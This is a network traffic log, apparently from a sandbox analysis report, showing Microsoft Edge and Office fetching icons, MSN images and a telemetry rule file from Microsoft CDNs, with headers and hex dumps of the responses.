2024-11-11 23:06:29 UTC	433	OUT	GET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-11 23:06:29 UTC	536	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:29 GMT Content-Type: image/png Content-Length: 1427 Connection: close Last-Modified: Fri, 03 Nov 2023 21:43:36 GMT ETag: 0x8DBDCB5EF021F8E x-ms-request-id: 30153a40-301e-0002-3266-346afd000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241111T230629Z-174f7845968j9dchhC1EWRfe7400000005d000000000ed62 Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-11 23:06:29 UTC	1427	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 05 28 49 44 41 54 78 01 ed 57 cd 6b 24 45 14 7f af 67 86 c4 5d cd 8e 9b 05 d1 3d ec e8 1f 20 5e 3d 28 eb 41 04 41 44 10 3c 66 d1 53 92 d3 42 40 72 da 11 84 5c b3 7f 80 24 39 48 40 d4 8b 17 2f b2 e2 1f a0 1e 25 a7 01 11 16 17 35 1f f3 d1 dd d5 55 cf 57 df d5 d3 eb 4e 5a f0 22 53 a1 52 9d 57 5d ef fd de ef 7d 74 05 60 39 96 63 39 96 e3 3f 1d 08 ff 62 1c 1f 1f df e6 e5 9e 52 ea 15 5e fb bc 02 11 99 a9 9f f5 e4 41 52 4a 74 7b df f3 7a 77 7b 7b fb 67 68 39 5a 03 3c 3a 3a da 40 c4 43 0f ea 1f 56 3d 34 38 e2 89 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAa(IDATxWk$Eg]= ^=(AAD<fSB@r\$9H@/%5UWNZ"SRW]}t`9c9?bR^ARJt{zw{{gh9Z<::@CV=48

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.5	49884	13.107.246.40	443	7344	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:29 UTC	422	OUT	GET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-11 23:06:29 UTC	516	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:29 GMT Content-Type: image/png Content-Length: 2229 Connection: close Last-Modified: Wed, 25 Oct 2023 19:48:24 GMT ETag: 0x8DBD59359A9E77B x-ms-request-id: 929ff4d4-d01e-006e-5f8e-34c12e000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241111T230629Z-174f7845968nxc96hC1EWRspw800000005dg00000000302e Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-11 23:06:29 UTC	2229	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 08 4a 49 44 41 54 78 01 ed 98 6d 88 5c 57 19 c7 9f e7 dc 7b 37 89 49 9a dd 6c 5e d6 96 c0 c4 36 a1 d5 2f 49 a1 92 22 ea 06 ac a4 41 21 05 41 2a e8 ee 16 a4 82 e0 26 62 a5 b5 92 99 f1 8b 2f 68 b3 fd 92 16 ad 64 fb 29 16 62 53 6d 68 17 15 b2 a2 ed 07 b1 6c a8 95 d6 97 74 36 a9 35 69 d2 90 dd 6d bb 9b 99 7b ce 79 fc 3f e7 dc d9 8d 99 24 b3 2f f9 d8 03 77 9e 7b ce dc b9 e7 77 ff cf cb 39 77 88 3e 6c 4b 6b 4c 37 a8 f5 ee 1d 2b a5 44 25 c2 47 9a d2 f8 c8 8f b6 8f d3 0d 68 4b 06 dc f1 8d df f7 ae cc ba cb 6c a8 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaJIDATxm\W{7Il^6/I"A!A*&b/hd)bSmhlt65im{y?$/w{w9w>lKkL7+D%GhKl

Session ID	Source IP	Source Port	Destination IP	Destination Port
98	192.168.2.5	49870	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:29 UTC	192	OUT	GET /rules/rule120652v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:29 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:29 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT ETag: "0x8DC582B97E6FCDD" x-ms-request-id: d9045dfb-101e-00a2-06d5-339f2e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230629Z-174f7845968c2t8dhC1EWR8s2000000005ag00000000bcv8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:29 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.5	49892	104.117.182.72	443	7344	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:29 UTC	634	OUT	GET /tenant/amp/entityid/BB1msKSh.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-11 23:06:29 UTC	520	IN	HTTP/1.1 200 OK Last-Modified: Sun, 20 Oct 2024 20:29:46 GMT Access-Control-Allow-Origin: * X-Datacenter: eastap X-ActivityId: bf7af817-a9a9-43b3-830a-f8f10491cf72 Timing-Allow-Origin: * X-Frame-Options: DENY X-ResizerVersion: 1.0 Content-Type: image/jpeg Content-Location: https://img.s-msn.com/tenant/amp/entityid/BB1msKSh X-Source-Length: 116060 Content-Length: 116060 Cache-Control: public, max-age=77013 Expires: Tue, 12 Nov 2024 20:30:02 GMT Date: Mon, 11 Nov 2024 23:06:29 GMT Connection: close
2024-11-11 23:06:29 UTC	15864	IN	Data Raw: ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02 Data Ascii: XICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmdd
2024-11-11 23:06:29 UTC	16384	IN	Data Raw: b4 ba 4e d6 06 fd 6c 02 14 c9 bd 96 e5 ba dc 8d e3 b6 e8 89 2d ff 00 1e a1 c1 f0 f5 4b 6f 66 97 b0 db f8 3d 97 8e a1 46 cf df 87 c9 30 97 99 73 e3 ad a6 d9 89 2d 07 84 89 54 4b bc ad 2e 32 68 26 e7 2b 09 92 b6 c1 44 62 f3 13 c8 49 e5 70 15 68 2e 21 a0 12 4d 00 12 49 e8 2a 8e e0 f6 37 07 e3 73 89 98 48 73 63 f9 4b 44 4e d3 c5 02 5d 15 30 7a 98 b7 c9 4d a0 c3 10 c4 08 87 0a cc 02 38 b4 89 f9 2d 69 76 8b 81 22 0d c7 99 ad 77 fe 97 4d f6 24 21 e2 76 10 d9 10 09 81 22 44 d4 ef 7e a8 8e 6b ac 5a 5a 65 a2 43 65 ad 07 f8 92 60 13 99 8b 20 ae c2 e0 e3 89 c4 c8 00 38 03 2d ea ec 46 08 a4 5f 8a c1 88 d0 3a 48 22 00 fd b1 94 5d 0d a6 ff 00 8e 39 9f 29 9e db 10 6d 5d 92 8c ed 92 0d b6 e6 fd 91 db 3e 09 dc 69 e6 2e b4 c1 9f 2c e5 70 27 95 92 0c 44 61 6c f9 8d 37 22 96 Data Ascii: Nl-Kof=F0s-TK.2h&+DbIph.!MI*7sHscKDN]0zM8-iv"wM$!v"D~kZZeCe` 8-F_:H"]9)m]>i.,p'Dal7"
2024-11-11 23:06:29 UTC	2372	IN	Data Raw: 04 03 17 3c 43 a3 de 4a b5 92 05 29 b8 b0 9b d7 f1 36 b6 70 86 6c 4d 40 37 13 b6 46 f5 b2 06 b8 31 61 4a a9 05 d7 33 73 7b 89 82 77 be fd a8 2d 92 49 8b 45 f8 1e 22 be 29 85 89 cc 67 b1 cc 4c e5 9d 10 52 31 52 e4 f5 a4 67 1e c2 66 db f2 04 c7 08 1c 63 c7 75 b8 6c d2 21 dd 83 39 8b 5f c5 2b aa 37 cc 5c e7 65 96 93 41 b6 16 dc 1b 91 02 a4 52 d3 45 ae 75 ab 5e 9d 9f 4b 21 e9 e1 c2 41 02 66 d2 4e c6 7a 57 a7 44 7c c4 89 9d fc 0d 66 ca 82 b5 b8 c4 fe 30 2d f4 eb c4 a9 43 5e 72 e3 ba 87 e6 88 6b 8b 9a 4c 13 73 5c 89 81 9d fa a2 34 10 09 13 6b 5b dd 14 5d a4 f9 dd 51 02 36 02 3b 02 3b 49 61 02 48 c8 8a 72 34 51 01 c3 18 45 c8 ce f5 da 0d 95 6b dc 2f 37 1e f8 ae 6d ba b8 e6 c4 10 3b b8 db 64 9a 61 b8 bc b6 c5 58 b5 8c d4 99 b0 a2 8d a4 71 3d b2 4d 61 c1 bf c7 a1 Data Ascii: <CJ)6plM@7F1aJ3s{w-IE")gLR1Rgfcul!9_+7\eAREu^K!AfNzWD\|f0-C^rkLs\4k[]Q6;;IaHr4QEk/7m;daXq=Ma
2024-11-11 23:06:29 UTC	16384	IN	Data Raw: 46 9c 26 12 d3 62 88 cd 3c 78 bc cc 6c 34 bb cc e8 98 c8 6e 76 0a 8a dc 38 5c 1d 33 12 d3 78 ea 20 0f 19 00 21 42 24 50 88 33 22 26 4d 85 4d 39 2a 7f 2a 8e 3e c2 05 68 b8 98 e6 60 73 85 a2 09 18 8c 5c 49 ac 0d f2 44 92 e2 31 3a c2 c2 4d 00 f7 44 3a 19 13 d0 fd d0 14 7f 90 89 2c 60 02 c4 8c 20 c5 ef 84 13 27 73 da 84 5a 41 c8 e5 6a 22 33 4d da 8e c2 d1 26 f5 20 01 02 4f 98 90 12 03 7b d2 0d 2d 97 0e d4 0b 10 6e 9a b3 17 ed fd 11 5c 1c e7 39 da 8e 33 69 c5 25 c6 82 06 2b 92 07 82 0d a6 fe c2 2b 60 c5 39 e7 de a8 9d 32 08 22 62 b6 35 1e 05 57 19 36 98 ca c0 5b 2b 0f 15 41 83 30 38 1b 84 42 81 29 a0 c4 c0 ac 0b 89 ec af 3a 26 00 41 93 7b 46 dc d2 10 83 69 6b 2c 5a 5b 11 70 6d 36 33 c8 f5 5b 62 45 eb d8 3b d0 59 f7 f4 4f 33 33 73 6b 84 ae c3 fb 4b 88 dc 88 e1 Data Ascii: F&b<xl4nv8\3x !B$P3"&MM9**>h`s\ID1:MD:,` 'sZAj"3M& O{-n\93i%++`92"b5W6[+A08B):&A{Fik,Z[pm63[bE;YO33skK
2024-11-11 23:06:29 UTC	16384	IN	Data Raw: 64 2b 84 c9 91 d1 dd 78 da bd 60 71 5d 2f 86 4b 48 3f 93 7b 63 a8 db ad d5 73 44 cd 49 e7 3c 72 3e 25 5d b3 a7 3a 29 22 e0 9e 63 f8 9c ed b8 94 3c 1f 4f 97 e9 d8 ba 5f 0a e6 00 39 91 97 23 97 3e c4 bf 0f f2 b9 81 43 15 e8 46 71 d1 36 69 cf c3 1c bc 3d f2 e0 b2 23 a4 78 70 db dd 94 ff 00 86 6d 06 e6 9d 47 43 9f f4 d9 2f c3 34 11 d3 28 e9 d0 f4 b2 6c d2 0c 11 ef df 87 35 6f 6e 9e fd 8a 29 b8 33 8b 7b ec 3e e1 2e 11 6b 4e fd 7e be 1d 15 44 7a e5 d7 87 d0 e6 32 c8 ad f9 1b 6d f4 28 d8 0e c7 e6 ae 03 7e 82 79 7d c7 b9 41 1e d7 e0 3b 7d d0 ab ef 8f e8 a4 60 8b 5a d7 fa 75 1e 23 aa 4c 1d 3d ec 7e c7 b5 00 ae b7 17 d9 3e 18 f7 ee fe ee b2 29 d9 ef df 62 a8 d6 9a 56 d3 d8 b6 68 91 60 27 ec 80 c1 e6 0f 40 3e a8 d8 88 9a d8 81 da a1 e2 b7 bf 7c 16 cf be 1f 70 a0 9c Data Ascii: d+x`q]/KH?{csDI<r>%]:)"c<O_9#>CFq6i=#xpmGC/4(l5on)3{>.kN~Dz2m(~y}A;}`Zu#L=~>)bVh`'@>\|p
2024-11-11 23:06:29 UTC	7952	IN	Data Raw: 4a 96 c4 8e 60 f7 a6 70 c6 b9 ba da c7 d4 3e 4c 09 36 e7 92 95 e9 f4 c8 3c 73 df a1 0a 46 bf a0 0f 25 de 9f 8f c3 99 b6 ed 39 f0 50 bd 3f ab 76 89 87 89 8c cd 42 6f 73 8f b2 75 79 7b 0d 42 3d 3f a7 2d 71 12 ec af d9 55 e2 c4 97 df cd d1 77 7d 49 fe f5 b8 98 e1 39 89 f2 93 c6 6d cd 70 b0 bf 41 f1 a8 d7 09 88 3c f2 34 3c 42 ce 33 8b ee d6 4f 5b e9 5a e2 43 45 41 ad 62 33 ea 12 ff 00 d9 6a 89 00 3a 99 01 45 27 d0 bd 8f 04 b4 83 e4 b1 cf b2 ab cb fa c7 93 ac e2 72 f0 58 93 79 2d ae 8f a4 71 70 83 1d 1d 91 e9 1f 65 e8 de 3f b8 f4 e6 c7 13 47 31 d1 79 ef 46 5b 13 df c2 93 45 df f5 9a ce d2 d2 69 6d b1 08 ea 54 bd af c3 a9 e8 b5 be 3e 88 fe 4c f2 bd b9 82 3c 6e a7 47 e8 bc 0f a3 f5 6f 6b a4 12 0d 3a 2f 6f a1 ac 35 85 e0 3b bd 66 cd 31 7d c6 80 46 e8 52 ed 3a f9 Data Ascii: J`p>L6<sF%9P?vBosuy{B=?-qUw}I9mpA<4<B3O[ZCEAb3j:E'rXy-qpe?G1yF[EimT>L<nGok:/o5;f1}FR:
2024-11-11 23:06:29 UTC	16384	IN	Data Raw: 93 33 94 fb f7 4e c5 43 cb 62 a3 a8 36 ed 3d c5 04 71 f7 ef 75 93 ef df d5 04 af 88 5d 22 07 08 f1 8c 94 63 73 7a f7 ac 98 e1 dd f2 e5 d8 b4 bc 18 90 0f 87 b2 81 0e fd eb 1d 07 28 4d 3e fe 69 5c 5a 62 44 70 fb 2a 85 86 ef f4 59 84 67 96 de fb 90 8b 86 52 b2 56 90 c7 b5 58 04 2c 99 43 a1 d9 02 1b 74 55 3c ef ef e4 94 b5 b9 59 69 92 c1 da 55 58 41 19 ac 41 4f 14 aa d5 64 14 1e 15 6a a9 84 af 63 e7 31 11 ad 95 a1 bb a2 e2 02 c1 46 96 c0 24 2e 4a 5c 86 83 49 94 aa aa 88 aa ad 09 80 40 a8 ec 64 94 cd d3 dd 10 b8 70 46 9a 69 6a 04 22 b1 ce 40 26 54 1a 4a 55 89 95 46 26 58 11 d8 cc 46 10 20 69 2a 5b 58 05 6f 9a 24 45 80 a2 19 30 b2 d9 9c e4 07 6a 13 69 41 25 24 ca a9 b3 13 29 55 5a ab 2d 5b 09 c0 94 48 e8 a3 45 88 b8 bf bc 94 86 36 d2 47 b2 b1 91 e2 a4 3a 40 ae Data Ascii: 3NCb6=qu]"csz(M>i\ZbDpYgRVX,CtU<YiUXAAOdjc1F$.J\I@dpFij"@&TJUF&XF i[Xo$E0jiA%$)UZ-[HE6G:@
2024-11-11 23:06:29 UTC	16384	IN	Data Raw: a6 31 92 7a 19 ae 67 6b 0f 92 47 bb 15 48 04 08 e6 06 67 39 2a fc 4c 56 d5 f3 0c a6 64 70 cc 78 ac fa af a3 91 69 d9 32 57 81 88 81 44 d1 4f 7e ec ba b8 1c 13 43 db c3 74 ec 27 f6 c9 e8 93 88 a5 bc 11 19 6f 31 cc 5a d7 b7 35 1a 17 e2 df 0b 83 76 06 29 ef ad d3 bf 4d b6 0d 34 bd 6b c3 ec 86 df 33 86 fc 04 78 a3 ea 34 40 75 c4 5a dc b3 9e de 4b 2d fc 01 84 b2 f0 6f 15 e0 ba fa 4f 73 5a 00 83 4b 19 83 cc 57 ea a3 69 3e 4b c5 43 80 06 b1 06 92 6f 9c 71 45 d4 d2 87 c4 e7 02 0c c7 02 2c 7b 56 6b 78 f1 cc 75 b1 fc 36 62 00 c6 a3 73 ce 49 9c c8 b7 48 5e 7b 56 d5 10 7b 78 5a 17 59 d6 d1 6d 41 89 9b 8e d1 be db ae 16 ab a5 e7 6b d8 52 38 6c b3 8b 59 d2 48 11 51 ee 2a 56 03 11 07 c1 2f 54 c0 8a c5 17 57 01 24 71 9c f8 7b b2 23 20 cc c5 c1 1c 0f 25 1c 53 c7 f5 53 b4 Data Ascii: 1zgkGHg9LVdpxi2WDO~Ct'o1Z5v)M4k3x4@uZK-oOsZKWi>KCoqE,{Vkxu6bsIH^{V{xZYmAkR8lYHQV/TW$q{# %SS
2024-11-11 23:06:29 UTC	7952	IN	Data Raw: 61 55 58 b5 05 55 62 d4 15 32 b0 b1 41 b5 44 6d 21 64 59 68 0a 34 d5 d1 69 86 d8 09 91 9d c4 70 b0 50 05 ec a7 c7 91 b5 bd a2 87 8c 0c b2 1b c2 cd 6e 04 46 1d a3 8c f7 28 ee 03 7a ee a4 38 8b db 28 f7 b2 88 63 82 a9 41 4a 9a 89 55 65 53 2c 5a 10 6c 6c b7 ad 92 f2 5a 2e 2a 81 9b 72 9f 0c f5 41 a2 34 84 56 ce 43 3a 8e ab ad a0 ef 29 07 8c 46 62 97 17 f7 75 c9 1f 90 af 0c d7 4f 4c 86 83 36 99 3d 6d 15 06 92 28 42 c5 6f 15 3c 26 2e 76 c9 44 73 70 99 ae 7d 0c fd 94 cc 25 e0 b8 48 88 e5 b1 26 8a 2b 8d a2 2e 77 af 6f 7a 2d 44 30 4a 12 23 8d ca 1c 2d b9 b5 3c de 7b ba 24 94 c2 c8 86 8e 94 f7 45 40 24 1a db dd 82 a0 d6 c2 f6 be 5d 46 df 55 4f 0e 05 14 61 76 9a 15 d2 f4 a3 03 89 13 31 13 52 2f 5c ea 2c b9 4c b7 cd 76 bd 3f e2 f8 75 c9 0d da 26 b9 c8 e2 b9 de 9d 31 Data Ascii: aUXUb2ADm!dYh4ipPnF(z8(cAJUeS,ZllZ.*rA4VC:)FbuOL6=m(Bo<&.vDsp}%H&+.woz-D0J#-<{$E@$]FUOav1R/\,Lv?u&1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.5	49893	104.117.182.72	443	7344	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:29 UTC	634	OUT	GET /tenant/amp/entityid/BB1msFQB.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-11 23:06:29 UTC	521	IN	HTTP/1.1 200 OK Content-Type: image/jpeg Access-Control-Allow-Origin: * Content-Location: https://img.s-msn.com/tenant/amp/entityid/BB1msFQB Last-Modified: Mon, 28 Oct 2024 02:09:55 GMT X-Source-Length: 116349 X-Datacenter: eastap X-ActivityId: f2ff290f-82c6-4dc0-87ef-4eddf77d3861 Timing-Allow-Origin: * X-Frame-Options: DENY X-ResizerVersion: 1.0 Content-Length: 116349 Cache-Control: public, max-age=313427 Expires: Fri, 15 Nov 2024 14:10:16 GMT Date: Mon, 11 Nov 2024 23:06:29 GMT Connection: close
2024-11-11 23:06:29 UTC	15863	IN	Data Raw: ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02 Data Ascii: XICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmdd
2024-11-11 23:06:29 UTC	16384	IN	Data Raw: 92 8a d0 1c cf 51 57 14 54 bc d8 cc e1 ba b0 3b 9e a1 03 e6 76 ea 0b 24 2e 60 ce d3 ba 6f 54 75 40 ec e8 cf 15 95 71 5c ff 00 51 bd 56 7a 8d ea 8b 0b 2f 17 4a 8d 55 ad bd 42 52 f1 d5 3b 02 d9 77 15 4b 36 2c 59 5b fd c8 80 75 36 8f 35 b5 f1 50 65 2c 73 48 76 85 26 d5 7f 70 47 93 cf 8f 00 9a 5e 78 00 d8 f8 95 ce c2 d0 5d 19 09 a4 9b c1 bf bf e3 d5 75 b2 60 15 18 a4 37 8c fc 61 42 ce d3 1b 4c 97 17 70 d0 7e 25 70 7b 89 7f c3 af 43 b5 db f6 fd b5 21 ec 6c c1 b1 3a ca bf 4e 3a 83 c8 12 2c 1c b8 cd 71 60 a5 9c a3 82 c9 27 8a a7 fd 46 31 13 25 1e a7 65 d9 b1 8d e7 d9 40 7b ae 8d 0b 94 b2 63 65 8b f3 cd eb 45 f1 45 d7 77 19 0f 01 c2 ca b1 71 f3 e2 55 72 e5 1a c9 b7 2d db 65 51 64 e4 3e ea 29 e0 96 10 a4 61 2b 54 75 1b c2 5a ca 62 a2 53 1d 54 64 f1 29 2b ea 11 af Data Ascii: QWT;v$.`oTu@q\QVz/JUBR;wK6,Y[u65Pe,sHv&pG^x]u`7aBLp~%p{C!l:N:,q`'F1%e@{ceEEwqUr-eQd>)a+TuZbSTd)+
2024-11-11 23:06:29 UTC	2662	IN	Data Raw: f2 f4 34 50 39 0d c4 eb c8 30 6f a0 85 38 c3 69 98 1d 75 f2 57 4b 43 86 b4 ce 9c 0e e3 ef 64 37 13 5b 72 66 6c 23 8f 50 52 f7 3d 07 c0 a4 00 6c 92 27 a4 fe 10 99 d2 5b 14 b6 66 6f 6f 13 a7 92 67 0a 2c 1b b7 b9 f6 3e 49 ec 5a 06 84 de 34 bf f9 4a f5 1d 14 ea 32 01 6c f9 c4 03 f7 b2 8a 9d a6 d3 23 a4 44 78 ab be 99 20 02 40 eb 7d 7a 70 e1 2b 5a c6 b5 c4 92 0e d1 a0 07 8a be 49 13 45 30 c9 df a7 d3 f1 5b 49 d8 1e 9a 8d fc fe 8a d9 8e 9a e9 1a 0f 6e 1f 82 8b 88 b7 f5 de 78 74 4f 95 8a 8a fe 9b 89 99 b7 d3 5d 47 15 87 10 67 43 56 bf 54 c6 c6 c2 7a ce fc 7d b6 52 b8 92 48 22 26 dd 40 3f 1f 25 56 f0 2a 44 4d c7 ec 7a 47 de eb 00 1b 80 2f a5 93 d2 67 43 1f 1f 00 b1 cc 2d 92 23 41 1d 0c f5 fa 27 7d 77 0a 1c d2 d9 20 c8 8f 21 f7 e2 a3 90 e7 41 2e 22 76 09 da d7 1d Data Ascii: 4P90o8iuWKCd7[rfl#PR=l'[foog,>IZ4J2l#Dx @}zp+ZIE0[InxtO]GgCVTz}RH"&@?%V*DMzG/gC-#A'}w !A."v
2024-11-11 23:06:29 UTC	16384	IN	Data Raw: f3 2f f6 0e 07 21 d8 e8 31 ca d2 1d c2 fe 29 28 78 33 25 d3 b6 b1 bc db aa ee b7 13 e4 88 04 41 d4 02 76 1a 91 c2 74 55 ff 00 6f 04 00 e9 b3 af 24 3a 47 4b c4 09 9d 95 af 3a d9 b0 f6 ce 33 fd c1 f3 80 88 68 f7 f3 f1 5d 47 f6 6f f4 e0 18 27 59 eb 31 56 86 24 6c 15 67 f6 59 0b 88 c7 14 6a 2e 6d 79 22 60 4c fb ad 57 97 c6 f5 48 8e 12 ec 54 96 89 b3 bd a2 75 e8 02 88 e4 1a cf 5d 06 cb a4 7b 17 35 c0 12 44 83 7d 74 be a3 43 d2 62 54 ff 00 b6 10 d0 48 e5 32 5c e0 37 70 24 11 70 7d a1 37 e6 87 7b 0e 12 38 d1 3d 5b f9 28 64 cd 86 84 7b 7d fc 57 a4 38 4d 4d 71 dd c6 64 0b 34 4d ec 3c c4 15 49 d8 f2 63 24 36 e3 fe a1 2e b8 9b 8d 